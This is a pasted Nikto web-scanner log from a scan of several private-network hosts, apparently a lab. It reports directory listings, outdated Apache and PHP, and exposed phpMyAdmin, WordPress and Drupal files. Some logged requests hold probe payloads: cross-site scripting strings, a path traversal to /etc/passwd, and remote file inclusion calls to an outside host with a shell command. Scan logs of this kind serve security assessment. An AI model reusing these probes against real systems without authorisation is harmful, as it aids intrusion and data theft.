zAhYfvsU

· 5 years ago · Oct 26, 2019, 08:02 PM
1- Nikto v2.1.5/2.1.5
2+ Target Host: 192.168.1.12
3+ Target Port: 80
4+ GET /: The anti-clickjacking X-Frame-Options header is not present.
5+ -3268: GET /: /: Directory indexing found.
6+ HEAD /: Apache/2.2.14 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
7+ OPTIONS /: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
8+ -3268: GET /./: /./: Directory indexing found.
9+ -3268: GET /?mod=node&nid=some_thing&op=view: /?mod=node&nid=some_thing&op=view: Directory indexing found.
10+ -3268: GET /?mod=some_thing&op=browse: /?mod=some_thing&op=browse: Directory indexing found.
11+ GET /./: /./: Appending '/./' to a directory allows indexing
12+ -3268: GET //: //: Directory indexing found.
13+ GET //: //: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
14+ -3268: GET /?Open: /?Open: Directory indexing found.
15+ -3268: GET /?OpenServer: /?OpenServer: Directory indexing found.
16+ -3268: GET /%2e/: /%2e/: Directory indexing found.
17+ -576: GET /%2e/: /%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.
18+ -3268: GET /?mod=<script>alert(document.cookie)</script>&op=browse: /?mod=<script>alert(document.cookie)</script>&op=browse: Directory indexing found.
19+ -3268: GET /?sql_debug=1: /?sql_debug=1: Directory indexing found.
20+ -3268: GET ///: ///: Directory indexing found.
21+ -3268: GET /?PageServices: /?PageServices: Directory indexing found.
22+ -119: GET /?PageServices: /?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
23+ -3268: GET /?wp-cs-dump: /?wp-cs-dump: Directory indexing found.
24+ -119: GET /?wp-cs-dump: /?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.
25+ GET /phpmyadmin/changelog.php: Retrieved x-powered-by header: PHP/5.3.2-1ubuntu4.30
26+ -3092: GET /phpmyadmin/changelog.php: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
27+ -3268: GET /icons/: /icons/: Directory indexing found.
28+ -3268: GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
29+ -3288: GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when 	 /'s are requested.
30+ -3268: GET /?pattern=/etc/*&sort=name: /?pattern=/etc/*&sort=name: Directory indexing found.
31+ GET /phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: Cookie phpMyAdmin created without the httponly flag
32+ -3268: GET /?D=A: /?D=A: Directory indexing found.
33+ -3268: GET /?N=D: /?N=D: Directory indexing found.
34+ -3268: GET /?S=A: /?S=A: Directory indexing found.
35+ -3268: GET /?M=A: /?M=A: Directory indexing found.
36+ -3268: GET /?\"><script>alert('Vulnerable');</script>: /?\"><script>alert('Vulnerable');</script>: Directory indexing found.
37+ GET /icons/README: Server leaks inodes via ETags, header found with file /icons/README, inode: 168516, size: 5108, mtime: 0x438c0358aae80
38+ -3233: GET /icons/README: /icons/README: Apache default file found.
39+ -3268: GET /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: /?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: Directory indexing found.
40+ -3268: GET /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: /?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
41+ -3268: GET /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: /?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
42+ -3268: GET /?show=http://cirt.net/rfiinc.txt??: /?show=http://cirt.net/rfiinc.txt??: Directory indexing found.
43+ GET /wordpress/: Uncommon header 'x-pingback' found, with contents: http://192.168.1.12/wordpress/xmlrpc.php
44+ GET /wordpress/: /wordpress/: A Wordpress installation was found.
45+ GET /phpmyadmin/: /phpmyadmin/: phpMyAdmin directory found
46+ -3268: GET /?-s: /?-s: Directory indexing found.
47+ Target Host: 192.168.1.17
48+ Target Port: 80
49+ GET /: Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.29
50+ GET /: Cookie DOLSESSID_f5a888b167fcc4b13065db5ce7608989 created without the httponly flag
51+ GET //public/agenda/agendaexport.php: File/dir '/public/agenda/agendaexport.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
52+ GET //public/demo/: File/dir '/public/demo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
53+ GET //index.php: File/dir '/index.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
54+ GET //: File/dir '/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
55+ GET /robots.txt: "robots.txt" contains 4 entries which should be manually viewed.
56+ -3092: GET /admin/: /admin/: This might be interesting...
57+ -3092: GET /ftp/: /ftp/: This might be interesting...
58+ -3092: GET /includes/: /includes/: This might be interesting...
59+ -3092: GET /public/: /public/: This might be interesting...
60+ -3092: GET /support/: /support/: This might be interesting...
61+ -3092: GET /user/: /user/: This might be interesting...
62+ -3093: GET /admin/index.php: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
63+ Target Host: 192.168.1.13
64+ Target Port: 80
65+ GET /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
66+ GET /: Cookie session created without the httponly flag
67+ GET /: Cookie feindura_checkCookies created without the httponly flag
68+ DEBUG HASH(0x55e142a6cac8): DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
69+ -12184: GET /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
70+ -3268: GET /style/: /style/: Directory indexing found.
71+ -3233: GET /icons/README: /icons/README: Apache default file found.
72+ Target Host: 192.168.1.14
73+ Target Port: 80
74+ GET /: Retrieved x-powered-by header: PHP/7.2.22
75+ -877: TRACE /: HTTP TRACE method is active, suggesting the host is vulnerable to XST
76+ -3268: GET /img/: /img/: Directory indexing found.
77+ -3092: GET /img/: /img/: This might be interesting...
78+ -3268: GET /icons/: /icons/: Directory indexing found.
79+ -3233: GET /icons/README: /icons/README: Apache default file found.
80+ Target Host: 192.168.1.15
81+ Target Port: 80
82+ OPTIONS /: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE 
83+ -877: TRACE /: HTTP TRACE method is active, suggesting the host is vulnerable to XST
84+ GET /support/: Retrieved x-powered-by header: PHP/5.4.16
85+ GET /support/: Cookie OSTSESSID created without the httponly flag
86+ -3092: GET /support/: /support/: This might be interesting...
87+ -3268: GET /icons/: /icons/: Directory indexing found.
88+ -3233: GET /icons/README: /icons/README: Apache default file found.
89+ Target Host: 192.168.1.11
90+ Target Port: 80
91+ GET /: Uncommon header 'x-content-type-options' found, with contents: nosniff
92+ GET /: Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
93+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
94+ -3268: GET /includes/: /includes/: Directory indexing found.
95+ GET //includes/: File/dir '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
96+ -3268: GET /misc/: /misc/: Directory indexing found.
97+ GET //misc/: File/dir '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
98+ -3268: GET /modules/: /modules/: Directory indexing found.
99+ GET //modules/: File/dir '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
100+ -3268: GET /profiles/: /profiles/: Directory indexing found.
101+ GET //profiles/: File/dir '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
102+ -3268: GET /scripts/: /scripts/: Directory indexing found.
103+ GET //scripts/: File/dir '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
104+ -3268: GET /themes/: /themes/: Directory indexing found.
105+ GET //themes/: File/dir '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
106+ GET /cron.php: Uncommon header 'link' found, with contents: </?q=403-error>; rel="canonical",</?q=node/9>; rel="shortlink"
107+ GET //INSTALL.mysql.txt: File/dir '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
108+ GET //INSTALL.pgsql.txt: File/dir '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
109+ GET //INSTALL.sqlite.txt: File/dir '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
110+ GET //install.php: File/dir '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
111+ GET //LICENSE.txt: File/dir '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
112+ GET //MAINTAINERS.txt: File/dir '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
113+ GET /update.php: Cookie SESSba753efa2015157bd094d405599223a5 created without the httponly flag
114+ GET //UPGRADE.txt: File/dir '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
115+ GET //xmlrpc.php: File/dir '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
116+ GET //?q=filter/tips/: File/dir '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
117+ GET //?q=user/password/: File/dir '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
118+ GET //?q=user/register/: File/dir '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
119+ GET //?q=user/login/: File/dir '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
120+ GET /robots.txt: "robots.txt" contains 68 entries which should be manually viewed.
121+ DEBUG HASH(0x55e142a6aa78): DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
122+ -3092: GET /web.config: /web.config: ASP config file is accessible.
123+ -3092: GET /includes/: /includes/: This might be interesting...
124+ -3092: GET /misc/: /misc/: This might be interesting...
125+ -3092: GET /UPGRADE.txt: /UPGRADE.txt: Default file found.
126+ -3092: GET /install.php: /install.php: Drupal install.php file found.
127+ -3092: GET /install.php: /install.php: install.php file found.
128+ -3092: GET /LICENSE.txt: /LICENSE.txt: License file found may identify site software.
129+ -3092: GET /xmlrpc.php: /xmlrpc.php: xmlrpc.php was found.
130+ -3233: GET /INSTALL.mysql.txt: /INSTALL.mysql.txt: Drupal installation file found.
131+ -3233: GET /INSTALL.pgsql.txt: /INSTALL.pgsql.txt: Drupal installation file found.
132+ -3233: GET /icons/README: /icons/README: Apache default file found.
133+ -3268: GET /sites/: /sites/: Directory indexing found.
134+ Target Host: _gateway
135+ Target Port: 80
136+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN